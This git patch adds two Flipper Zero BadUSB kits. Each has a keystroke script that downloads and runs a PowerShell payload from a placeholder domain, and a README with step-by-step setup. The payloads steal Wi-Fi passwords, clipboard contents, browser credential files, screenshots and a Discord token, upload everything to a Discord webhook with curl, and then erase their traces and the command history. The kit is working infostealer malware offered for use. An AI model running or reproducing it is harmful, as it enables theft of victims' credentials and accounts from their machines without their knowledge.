From 98eef4d47cb2212bd9eba379d5a30ccca5800b66 Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Wed, 9 Aug 2023 08:18:48 -0700 Subject: [PATCH] Added s4dic BadUSB --- .../DiscordGrabber/DiscordGrabber.txt | 207 +++++++++++++++ .../s4dic - BadUSB/DiscordGrabber/ReadMe.md | 29 ++ .../payload à upload en ligne.ps1 | 247 ++++++++++++++++++ .../s4dic - BadUSB/passwordgrabber/ReadMe.md | 28 ++ BadUSB/s4dic - BadUSB/passwordgrabber/mdponly | 12 + .../payload à upload en ligne.ps1 | 166 ++++++++++++ 6 files changed, 689 insertions(+) create mode 100644 BadUSB/s4dic - BadUSB/DiscordGrabber/DiscordGrabber.txt create mode 100644 BadUSB/s4dic - BadUSB/DiscordGrabber/ReadMe.md create mode 100644 BadUSB/s4dic - BadUSB/DiscordGrabber/payload à upload en ligne.ps1 create mode 100644 BadUSB/s4dic - BadUSB/passwordgrabber/ReadMe.md create mode 100644 BadUSB/s4dic - BadUSB/passwordgrabber/mdponly create mode 100644 BadUSB/s4dic - BadUSB/passwordgrabber/payload à upload en ligne.ps1 diff --git a/BadUSB/s4dic - BadUSB/DiscordGrabber/DiscordGrabber.txt b/BadUSB/s4dic - BadUSB/DiscordGrabber/DiscordGrabber.txt new file mode 100644 index 00000000..aa6275cd --- /dev/null +++ b/BadUSB/s4dic - BadUSB/DiscordGrabber/DiscordGrabber.txt @@ -0,0 +1,207 @@ +REM This script grab wifi password, Discord file(for token), and password file from Firefox , Chrome, Edge +REM Change URL by yours + +DELAY 1000 +GUI r +DELAY 500 +STRING powershell Set-ExecutionPolicy -Scope "CurrentUser" -ExecutionPolicy "Unrestricted"; powershell -c Start-BitsTransfer -Source http://nomdecomaine.com/p -Destination $env:temp\p.ps1; powershell $env:temp\p.ps1; +DELAY 500 +ENTER +DELAY 250 +WINDOWS DOWNARROW +DELAY 20000 +GUI r +DELAY 500 +STRING microsoft-edge: +DELAY 300 +ENTER +DELAY 600 +GUI r +DELAY 500 +STRING microsoft-edge: +DELAY 500 +ENTER +DELAY 4000 +STRING chrome://inspect/#devices +ENTER +DELAY 18000 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +TAB +DELAY 100 +SPACE +DELAY 2000 +WINDOWS UPARROW +DELAY 100 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +SPACE +DELAY 250 +DOWNARROW +DELAY 250 +DOWNARROW +DELAY 250 +ENTER +DELAY 500 +STRING webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m.find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken() +DELAY 200 +ENTER +DELAY 200 +TAB +DELAY 150 +TAB +DELAY 150 +TAB +DELAY 150 +TAB +DELAY 150 +TAB +DELAY 150 +TAB +DELAY 200 +SPACE +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 250 +TAB +DELAY 500 +CTRL a +DELAY 400 +CTRL c +DELAY 1000 +TAB +DELAY 250 +TAB +DELAY 500 +CTRL a +DELAY 400 +CTRL c diff --git a/BadUSB/s4dic - BadUSB/DiscordGrabber/ReadMe.md b/BadUSB/s4dic - BadUSB/DiscordGrabber/ReadMe.md new file mode 100644 index 00000000..da86ab90 --- /dev/null +++ b/BadUSB/s4dic - BadUSB/DiscordGrabber/ReadMe.md @@ -0,0 +1,29 @@ +### Stole the discord token with the BadUSB mode +* the script does not require any administrator rights + +## Installation : +* Step 1: Have a domain name and hosting + a zero flipper +* Step 2: Go to my github and get the two files: https://github.com/s4dic/FlipperZero/tree/main/BadUsb/DiscordGrabber +* Step 3: Create a Discord server where only you have access ( the server will allow to send the victim's info so be careful: if it's a public server for can be report and ban from discord) +* Step 4: Create a textual channel on the discord you just created then go to the channel settings to create a webhook +* Step 5: Modify the script "payload to upload online.ps1" by changing the URL of the webhook (at the beginning of the script). +* Step 6: Rename the script you just modified with a name following "p" (do not put another name, and the name must be without quotes and without extension), then send your script on hosting, check that your script is accessible with your domainname.com/p +* Step 7: Open the file "DiscordGrabber.txt" and change the url http://domain.com/p by your URL. +* Step 8: Place the file "DiscordGrabber.txt" in your flipper zero in the folder badusb, either in the root of this folder or in a subfolder +* Step 9: Launch the attack (on a vm or on your pc it doesn't matter) + +## Demo : +[https://youtu.be/9SCo1_XL6R4](https://youtu.be/9SCo1_XL6R4) + +## Data Exfiltrated : +- `Token Discord` - Get the private token of running discord client (+screen capture of token) +- `PC Name` - Get the name of PC +- `ClipBoard` - Get the PC ClipBoard +- `environment variables` - The environment variables use on the PC +- `PUBLIC IP` - Get the Public WAN IPv4 +- `PRIVATE IP` - Get the Private LAN IPv4 +- `Other network information` - Other network informations like: Gateway, DNS, DHCP, network card(MAC), IPv6, etc... +- `Installed Software` - List all installed application on the PC +- `Web Browser Password` - Get the private file containing web browser password (Works with firefox,Edge & Chrome) (you need copy/past the file to the %appdata% web broser folder to get cleared password) +- `Screen Capture` - Get a screen capture before the attack begins +- `WIFI Password` - Get in clear all wifi password stored (if pc don't have a wifi password you get a blank txt file) diff --git a/BadUSB/s4dic - BadUSB/DiscordGrabber/payload à upload en ligne.ps1 b/BadUSB/s4dic - BadUSB/DiscordGrabber/payload à upload en ligne.ps1 new file mode 100644 index 00000000..92324ea3 --- /dev/null +++ b/BadUSB/s4dic - BadUSB/DiscordGrabber/payload à upload en ligne.ps1 @@ -0,0 +1,247 @@ +#Payload to execute in your flipperZero: this dowload, execute and clear history +#$n='i';set-alias v $n'wr';$b=[char]116;$c=[char]47;$a=$([char]104+$b+$b+[char]112+[char]58+$c+$c);IEX (v -usebasicparsing $a'raw.githubusercontent.com/s4dic/DiscordGrabber/main/bd.ps1?token=GHSAT0AAAAAABXCYHCCGGWFF43MHDED24HEYXT6JBQ'); PSReadLine; [Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory(); exit + +#Todo: +# Correct the Edge password error + +#CHANGE URL TO YOUR URL + $url="https://discord.com/api/webhooks/XXXXXXXXXXXXXXXXXXXX/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" ; +#Get PC Name+Date+Time + $namepc = Get-Date -UFormat "$env:computername-$env:UserName-%m-%d-%Y_%H-%M-%S" + +# Get PC ClipBoard + echo "" > "$env:temp\stats-$namepc.txt"; + echo "####PC ClipBoard under this line:" >> "$env:temp\stats-$namepc.txt"; + echo "####################################" >> "$env:temp\stats-$namepc.txt"; + Get-Clipboard >> "$env:temp\stats-$namepc.txt"; + echo "####################################" >> "$env:temp\stats-$namepc.txt"; + echo "####End ClipBoard" >> "$env:temp\stats-$namepc.txt"; + +# Get WifiPassword +echo "" > "$env:temp\WIFI-$namepc.txt"; +(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | out-file "$env:temp\WIFI-$namepc.txt"; + +# Screenshot + cd "$env:temp"; + echo 'function Get-ScreenCapture' > "d.ps1"; + echo '{' >> "d.ps1"; + echo ' begin {' >> "d.ps1"; + echo ' Add-Type -AssemblyName System.Drawing, System.Windows.Forms' >> "d.ps1"; + echo ' Add-Type -AssemblyName System.Drawing' >> "d.ps1"; + echo ' $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() |' >> "d.ps1"; + echo ' Where-Object { $_.FormatDescription -eq "JPEG" }' >> "d.ps1"; + echo ' }' >> "d.ps1"; + echo ' process {' >> "d.ps1"; + echo ' Start-Sleep -Milliseconds 44' >> "d.ps1"; + echo ' [Windows.Forms.Sendkeys]::SendWait("{PrtSc}")' >> "d.ps1"; + echo ' Start-Sleep -Milliseconds 550' >> "d.ps1"; + echo ' $bitmap = [Windows.Forms.Clipboard]::GetImage()' >> "d.ps1"; + echo ' $ep = New-Object Drawing.Imaging.EncoderParameters' >> "d.ps1"; + echo ' $ep.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, [long]100)' >> "d.ps1"; + echo ' $screenCapturePathBase = $env:temp + "\" + $env:UserName + "_Capture"' >> "d.ps1"; + echo ' $bitmap.Save("${screenCapturePathBase}.jpg", $jpegCodec, $ep)' >> "d.ps1"; + echo ' }' >> "d.ps1"; + echo '}' >> "d.ps1"; + echo 'Get-ScreenCapture' >> "d.ps1"; + sleep 1 + $screencapture = echo $env:temp"\"$env:UserName"_Capture" + powershell -c $env:temp\d.ps1; + $Screencap = "$env:temp\d.ps1"; + +#New token Grab Method Aug 2022 + taskkill /IM Discord.exe /F + taskkill /IM Discord.exe /F + gci $env:appdata\..\local\Discord\app-*\ | ? { $_.PSIsContainer } | sort CreationTime -desc | select -f 1 | cd; + .\Discord.exe --remote-debugging-port=9222 + +#Get Discord Folder (deprecated function) +# #Discord ZIP +# Add-Type -Assembly "System.IO.Compression.FileSystem" ; +# #Kill Discord +# taskkill /IM Discord.exe /F +# cd C:\Users\$env:UserName\AppData\Local\Discord\app-*\; .\Discord.exe --remote-debugging-port=9222; +#Define zip to copy +# $tokenfile = "$env:temp\Discord-Token-$namepc.zip" + +# Get PC information + dir env: >> "$env:temp\stats-$namepc.txt"; +# Get public IP + $pubip = (Invoke-WebRequest -UseBasicParsing -uri "http://ifconfig.me/").Content + echo "PUBLIC IP: $pubip" >> "$env:temp\stats-$namepc.txt"; +# Get Local IP + ipconfig /all >> "$env:temp\stats-$namepc.txt"; +# List all installed Software + echo "Installed Software:" >> "$env:temp\stats-$namepc.txt"; + Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize >> "$env:temp\stats-$namepc.txt"; + Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize >> "$env:temp\stats-$namepc.txt"; + +#Get FireFox Password + #firefox ZIP + Add-Type -Assembly "System.IO.Compression.FileSystem" ; + #Kill Firefox + taskkill /IM firefox.exe /F + #search key4.db and logins.json + $key4 = Get-Childitem -Path $env:appdata\Mozilla\Firefox\Profiles\ -Include key4.db -Recurse -ErrorAction SilentlyContinue | % { $_.fullname } + $logins = Get-Childitem -Path $env:appdata\Mozilla\Firefox\Profiles\ -Include logins.json -Recurse -ErrorAction SilentlyContinue | % { $_.fullname } + #Compress firefox files where stored passwords + $compress = @{ + Path = "$key4", "$logins" + CompressionLevel = "Fastest" + DestinationPath = "$env:temp\Firefox-Password-$namepc.zip" + } + Compress-Archive @compress -Update +#Define zip to copy +$firefoxpassword = "$env:temp\Firefox-Password-$namepc.zip" + +#Get Chrome Password + #Chrome ZIP + Add-Type -Assembly "System.IO.Compression.FileSystem"; + #Kill Chrome + taskkill /IM chrome.exe /F + sleep 1 + #Compress chrome files where stored passwords + $compress = @{ + Path = "$env:appdata\..\local\Google\Chrome\User Data\Local State", "$env:appdata\..\local\Google\Chrome\User Data\default\Login Data", "$env:appdata\..\local\Google\Chrome\User Data\default\Preferences" + CompressionLevel = "Fastest" + DestinationPath = "$env:temp\Chrome-Password-$namepc.zip" + } + Compress-Archive @compress -Update + sleep 1 +#Define zip to copy +$chromepassword = "$env:temp\Chrome-Password-$namepc.zip" + +#Get Edge Password + #Edge ZIP + Add-Type -Assembly "System.IO.Compression.FileSystem" ; + #Kill Edge + taskkill /IM msedge.exe /F + sleep 1 + #Compress Edge files where stored passwords + $compress = @{ + Path = "$env:appdata\..\Local\Microsoft\Edge\User Data\Local State", "$env:appdata\..\Local\Microsoft\Edge\User Data\default\Login Data", "$env:appdata\..\Local\Microsoft\Edge\User Data\default\Preferences" + CompressionLevel = "Fastest" + DestinationPath = "$env:temp\Edge-Password-$namepc.zip" + } + Compress-Archive @compress -Update + sleep 1 +#Define zip to copy +$edgepassword = "$env:temp\Edge-Password-$namepc.zip" + +#Backup Edge folder to star with empty edge browser, to get Token with flipper + #Kill Edge Again + taskkill /IM msedge.exe /F + mv $env:APPDATA\..\Local\Microsoft\Edge $env:APPDATA\..\Local\Microsoft\ZZZZZZZ + +#Sleep 60 to wait flipperzero action on discord token +sleep 60 + +#get discord token with Clipboard Method + Get-Clipboard >> "$env:temp\tk.txt"; + $token =Get-content -tail 1 "$env:temp\tk.txt"; + echo "" >> "$env:temp\stats-$namepc.txt"; + echo "Discord Token" >> "$env:temp\stats-$namepc.txt"; + echo "########" >> "$env:temp\stats-$namepc.txt"; + echo $token >> "$env:temp\stats-$namepc.txt"; + echo "########" >> "$env:temp\stats-$namepc.txt"; + + # Screenshot Token for Backup if clipboard Fail: + cd "$env:temp"; + echo 'function Get-ScreenCapture' > "d.ps1"; + echo '{' >> "d.ps1"; + echo ' begin {' >> "d.ps1"; + echo ' Add-Type -AssemblyName System.Drawing, System.Windows.Forms' >> "d.ps1"; + echo ' Add-Type -AssemblyName System.Drawing' >> "d.ps1"; + echo ' $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() |' >> "d.ps1"; + echo ' Where-Object { $_.FormatDescription -eq "JPEG" }' >> "d.ps1"; + echo ' }' >> "d.ps1"; + echo ' process {' >> "d.ps1"; + echo ' Start-Sleep -Milliseconds 44' >> "d.ps1"; + echo ' [Windows.Forms.Sendkeys]::SendWait("{PrtSc}")' >> "d.ps1"; + echo ' Start-Sleep -Milliseconds 550' >> "d.ps1"; + echo ' $bitmap = [Windows.Forms.Clipboard]::GetImage()' >> "d.ps1"; + echo ' $ep = New-Object Drawing.Imaging.EncoderParameters' >> "d.ps1"; + echo ' $ep.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, [long]100)' >> "d.ps1"; + echo ' $screenCapturePathBase = $env:temp + "\" + $env:UserName + "Token_Capture"' >> "d.ps1"; + echo ' $bitmap.Save("${screenCapturePathBase}.jpg", $jpegCodec, $ep)' >> "d.ps1"; + echo ' }' >> "d.ps1"; + echo '}' >> "d.ps1"; + echo 'Get-ScreenCapture' >> "d.ps1"; + $tokencapture = echo $env:temp"\"$env:UserName"Token_Capture" + powershell -c $env:temp\d.ps1; + $Screencap = "$env:temp\d.ps1"; + +#UPLOAD +cd $env:temp +# Send Name Computer to discord + $Body=@{ content = "**Stats from Flipper-Zero on user:** $env:UserName, on pc: $env:computername"}; + Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json); +# Upload Stat + curl.exe -F "file1=@stats-$namepc.txt" $url; +# Upload wifi password + curl.exe -F "file2=@WIFI-$namepc.txt" $url; +# Upload Token Clipboard + $Body=@{ content = "**Discord Token:** ||$token||"}; + Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json); +# Upload Token Screenshot Backup + $Body=@{ content = "**Token Capture Backup if clipBoard Fail:**"}; + Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json); + curl.exe -F "file2=@$tokencapture.jpg" $url; +# Upload Discord Token (deprecated function) +# curl.exe -i -F file=@"$tokenfile" $url + +# Upload Webbroser Password Pwned + $Body=@{ content = "**Web Browsers Password Pwned**"}; + Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json); +# Upload firefox password + curl.exe -i -F file=@"$firefoxpassword" $url +# Upload chrome password + curl.exe -i -F file=@"$chromepassword" $url +# Upload Edge password + curl.exe -i -F file=@"$edgepassword" $url +# Upload screenshot + sleep 1 + $Body=@{ content = "**Screen Capture before attack start**"}; + Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json); + curl.exe -F "file2=@$screencapture.jpg" $url; + +# Remove Edge clear configuration + # Kill again and agan Edge after flipper zero get the token + taskkill /IM msedge.exe /F + Remove-Item $env:APPDATA\..\Local\Microsoft\Edge -Force -Recurse; + sleep 2 + Remove-Item $env:APPDATA\..\Local\Microsoft\Edge -Force -Recurse; + # Restore Edge configuration + mv $env:APPDATA\..\Local\Microsoft\ZZZZZZZ $env:APPDATA\..\Local\Microsoft\Edge + +#Delete all file +# Delete ZIP Discord Token (deprecated function) +# Remove-Item "$tokenfile" -Force -Recurse; +# Delete stat + Remove-Item "stats-$namepc.txt" -Force -Recurse; +# Delete wifi password + Remove-Item "WIFI-$namepc.txt" -Force -Recurse; +# Delete screenshot + Remove-Item $screencapture* -Force -Recurse; +# Delete token screencapture + Remove-Item $tokencapture* -Force -Recurse; +# Delete token file + Remove-Item "$env:temp\tk.txt"; -Force -Recurse; +# Delete firefox password + Remove-Item $firefoxpassword -Force -Recurse; +# Delete Chrome password + Remove-Item $chromepassword -Force -Recurse; +# Delete Edge password + Remove-Item $edgepassword -Force -Recurse; +# Delete this script + Remove-Item $env:temp\p.ps1 -Force -Recurse; +# Delete screencapture script + Remove-Item $env:temp\d.ps1 -Force -Recurse; + +#Last discord kill before quit +taskkill /IM Discord.exe /F + +# Clear History powershell: + [Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory(); +# Clear run powershell: + Remove-Item HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU +exit; diff --git a/BadUSB/s4dic - BadUSB/passwordgrabber/ReadMe.md b/BadUSB/s4dic - BadUSB/passwordgrabber/ReadMe.md new file mode 100644 index 00000000..4d4faae9 --- /dev/null +++ b/BadUSB/s4dic - BadUSB/passwordgrabber/ReadMe.md @@ -0,0 +1,28 @@ +### Stole pc password with the BadUSB mode +* the script does not require any administrator rights + +## Installation : +* Step 1: Have a domain name and hosting + a zero flipper +* Step 2: go to my github and get the two files: https://github.com/s4dic/FlipperZero/tree/main/BadUsb/passwordgrabber +* Step 3: Create a Discord server where only you have access ( the server will allow to send the victim's info so be careful: if it's a public server for can be report and ban from discord) +* Step 4: Create a textual channel on the discord you just created then go to the channel settings to create a webhook +* Step 5: Modify the script "payload to upload online.ps1" by changing the URL of the webhook (at the beginning of the script). +* Step 6: Rename the script you just modified with a name following "e" (do not put another name, and the name must be without quotes and without extension), then send your script on hosting, check that your script is accessible with your domainname.com/e +* Step 7: Open the file "mdponly" change the url http://domain.com/e by your URL. +* Step 8: Place the file "mdponly" in your flipper zero in the folder badusb, either in the root of this folder or in a subfolder +* Step 9: Launch the attack (on a vm or on your pc it doesn't matter) + +## Demo : +[https://youtu.be/OfgyzUYEPXw](https://youtu.be/OfgyzUYEPXw) + +## Data Exfiltrated : +- `PC Name` - Get the name of PC +- `ClipBoard` - Get the PC ClipBoard +- `environment variables` - The environment variables use on the PC +- `PUBLIC IP` - Get the Public WAN IPv4 +- `PRIVATE IP` - Get the Private LAN IPv4 +- `Other network information` - Other network informations like: Gateway, DNS, DHCP, network card(MAC), IPv6, etc... +- `Installed Software` - List all installed application on the PC +- `Web Browser Password` - Get the private file containing web browser password (Works with firefox,Edge & Chrome) (you need copy/past the file to the %appdata% web broser folder to get cleared password) +- `Screen Capture` - Get a screen capture before the attack begins +- `WIFI Password` - Get in clear all wifi password stored (if pc don't have a wifi password you get a blank txt file) diff --git a/BadUSB/s4dic - BadUSB/passwordgrabber/mdponly b/BadUSB/s4dic - BadUSB/passwordgrabber/mdponly new file mode 100644 index 00000000..57bde4bf --- /dev/null +++ b/BadUSB/s4dic - BadUSB/passwordgrabber/mdponly @@ -0,0 +1,12 @@ +DELAY 1000 +GUI r +DELAY 500 +STRING powershell Set-ExecutionPolicy -Scope "CurrentUser" -ExecutionPolicy "Unrestricted"; powershell -c Start-BitsTransfer -Source http://domain.com/e -Destination $env:temp\e.ps1; powershell $env:temp\e.ps1; +DELAY 500 +ENTER +DELAY 1000 +STRING T +DELAY 500 +ENTER +DELAY 1000 +WINDOWS DOWNARROW diff --git a/BadUSB/s4dic - BadUSB/passwordgrabber/payload à upload en ligne.ps1 b/BadUSB/s4dic - BadUSB/passwordgrabber/payload à upload en ligne.ps1 new file mode 100644 index 00000000..06e851e6 --- /dev/null +++ b/BadUSB/s4dic - BadUSB/passwordgrabber/payload à upload en ligne.ps1 @@ -0,0 +1,166 @@ +#CHANGE URL TO YOUR URL + $url="https://discord.com/api/webhooks/XXXXXXXXXXXXXXXXXXXX/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" ; +#Get PC Name+Date+Time + $namepc = Get-Date -UFormat "$env:computername-$env:UserName-%m-%d-%Y_%H-%M-%S" + +# Get PC ClipBoard + echo "" > "$env:temp\stats-$namepc.txt"; + echo "####PC ClipBoard under this line:" >> "$env:temp\stats-$namepc.txt"; + echo "####################################" >> "$env:temp\stats-$namepc.txt"; + Get-Clipboard >> "$env:temp\stats-$namepc.txt"; + echo "####################################" >> "$env:temp\stats-$namepc.txt"; + echo "####End ClipBoard" >> "$env:temp\stats-$namepc.txt"; + +# Get WifiPassword +echo "" > "$env:temp\WIFI-$namepc.txt"; +(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | out-file "$env:temp\WIFI-$namepc.txt"; + +# Screenshot + cd "$env:temp"; + echo 'function Get-ScreenCapture' > "d.ps1"; + echo '{' >> "d.ps1"; + echo ' begin {' >> "d.ps1"; + echo ' Add-Type -AssemblyName System.Drawing, System.Windows.Forms' >> "d.ps1"; + echo ' Add-Type -AssemblyName System.Drawing' >> "d.ps1"; + echo ' $jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() |' >> "d.ps1"; + echo ' Where-Object { $_.FormatDescription -eq "JPEG" }' >> "d.ps1"; + echo ' }' >> "d.ps1"; + echo ' process {' >> "d.ps1"; + echo ' Start-Sleep -Milliseconds 44' >> "d.ps1"; + echo ' [Windows.Forms.Sendkeys]::SendWait("{PrtSc}")' >> "d.ps1"; + echo ' Start-Sleep -Milliseconds 550' >> "d.ps1"; + echo ' $bitmap = [Windows.Forms.Clipboard]::GetImage()' >> "d.ps1"; + echo ' $ep = New-Object Drawing.Imaging.EncoderParameters' >> "d.ps1"; + echo ' $ep.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, [long]100)' >> "d.ps1"; + echo ' $screenCapturePathBase = $env:temp + "\" + $env:UserName + "_Capture"' >> "d.ps1"; + echo ' $bitmap.Save("${screenCapturePathBase}.jpg", $jpegCodec, $ep)' >> "d.ps1"; + echo ' }' >> "d.ps1"; + echo '}' >> "d.ps1"; + echo 'Get-ScreenCapture' >> "d.ps1"; + $screencapture = echo $env:temp"\"$env:UserName"_Capture" + powershell -c $env:temp\d.ps1; + $Screencap = "$env:temp\d.ps1"; + +# Get PC information + dir env: >> "$env:temp\stats-$namepc.txt"; +# Get public IP + $pubip = (Invoke-WebRequest -UseBasicParsing -uri "http://ifconfig.me/").Content + echo "PUBLIC IP: $pubip" >> "$env:temp\stats-$namepc.txt"; +# Get Local IP + ipconfig /all >> "$env:temp\stats-$namepc.txt"; +# List all installed Software + echo "Installed Software:" >> "$env:temp\stats-$namepc.txt"; + Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize >> "$env:temp\stats-$namepc.txt"; + Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize >> "$env:temp\stats-$namepc.txt"; + +# Get FireFox Password + #firefox ZIP + Add-Type -Assembly "System.IO.Compression.FileSystem" ; + #Kill Firefox + taskkill /IM firefox.exe /F + #search key4.db and logins.json + $key4 = Get-Childitem -Path $env:appdata\Mozilla\Firefox\Profiles\ -Include key4.db -Recurse -ErrorAction SilentlyContinue | % { $_.fullname } + $logins = Get-Childitem -Path $env:appdata\Mozilla\Firefox\Profiles\ -Include logins.json -Recurse -ErrorAction SilentlyContinue | % { $_.fullname } + #Compress firefox files where stored passwords + $compress = @{ + Path = "$key4", "$logins" + CompressionLevel = "Fastest" + DestinationPath = "$env:temp\Firefox-Password-$namepc.zip" + } + Compress-Archive @compress -Update +#Define zip to copy +$firefoxpassword = "$env:temp\Firefox-Password-$namepc.zip" + +#Get Chrome Password + #Chrome ZIP + Add-Type -Assembly "System.IO.Compression.FileSystem"; + #Kill Chrome + taskkill /IM chrome.exe /F + sleep 1 + #Compress chrome files where stored passwords + $compress = @{ + Path = "$env:appdata\..\local\Google\Chrome\User Data\Local State", "$env:appdata\..\local\Google\Chrome\User Data\default\Login Data", "$env:appdata\..\local\Google\Chrome\User Data\default\Preferences" + CompressionLevel = "Fastest" + DestinationPath = "$env:temp\Chrome-Password-$namepc.zip" + } + Compress-Archive @compress -Update + sleep 1 +#Define zip to copy +$chromepassword = "$env:temp\Chrome-Password-$namepc.zip" + +#Get Edge Password + #Edge ZIP + Add-Type -Assembly "System.IO.Compression.FileSystem" ; + #Kill Edge + taskkill /IM msedge.exe /F + sleep 1 + #Compress Edge files where stored passwords + $compress = @{ + Path = "$env:appdata\..\Local\Microsoft\Edge\User Data\Local State", "$env:appdata\..\Local\Microsoft\Edge\User Data\default\Login Data", "$env:appdata\..\Local\Microsoft\Edge\User Data\default\Preferences" + CompressionLevel = "Fastest" + DestinationPath = "$env:temp\Edge-Password-$namepc.zip" + } + Compress-Archive @compress -Update + sleep 1 +#Define zip to copy +$edgepassword = "$env:temp\Edge-Password-$namepc.zip" + +#UPLOAD +cd $env:temp +# Send Name Computer to discord + $Body=@{ content = "**Stats from Flipper-Zero on user:** $env:UserName, on pc: $env:computername"}; + Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json); +# Upload Stat + curl.exe -F "file1=@stats-$namepc.txt" $url; +# Upload wifi password + curl.exe -F "file2=@WIFI-$namepc.txt" $url; + +# Upload Webbroser Password Pwned + $Body=@{ content = "**Web Browsers Password Pwned**"}; + Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json); +# Upload firefox password + curl.exe -i -F file=@"$firefoxpassword" $url +# Upload chrome password + curl.exe -i -F file=@"$chromepassword" $url +# Upload Edge password + curl.exe -i -F file=@"$edgepassword" $url +# Upload screenshot + sleep 1 + $Body=@{ content = "**Screen Capture before attack start**"}; + Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json); + curl.exe -F "file2=@$screencapture.jpg" $url; + +# Remove Edge clear configuration + # Kill again and agan Edge after flipper zero get the token + taskkill /IM msedge.exe /F + Remove-Item $env:APPDATA\..\Local\Microsoft\Edge -Force -Recurse; + sleep 2 + Remove-Item $env:APPDATA\..\Local\Microsoft\Edge -Force -Recurse; + # Restore Edge configuration + mv $env:APPDATA\..\Local\Microsoft\ZZZZZZZ $env:APPDATA\..\Local\Microsoft\Edge + +#Delete all file +# Delete stat + Remove-Item "stats-$namepc.txt" -Force -Recurse; +# Delete wifi password + Remove-Item "WIFI-$namepc.txt" -Force -Recurse; +# Delete screenshot + Remove-Item $screencapture* -Force -Recurse; +# Delete token screencapture + Remove-Item $tokencapture* -Force -Recurse; +# Delete firefox password + Remove-Item $firefoxpassword -Force -Recurse; +# Delete Chrome password + Remove-Item $chromepassword -Force -Recurse; +# Delete Edge password + Remove-Item $edgepassword -Force -Recurse; +# Delete this script + Remove-Item $env:temp\e.ps1 -Force -Recurse; +# Delete screencapture script + Remove-Item $env:temp\d.ps1 -Force -Recurse; + +# Clear History powershell: + [Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory(); +# Clear run powershell: + Remove-Item HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU +exit;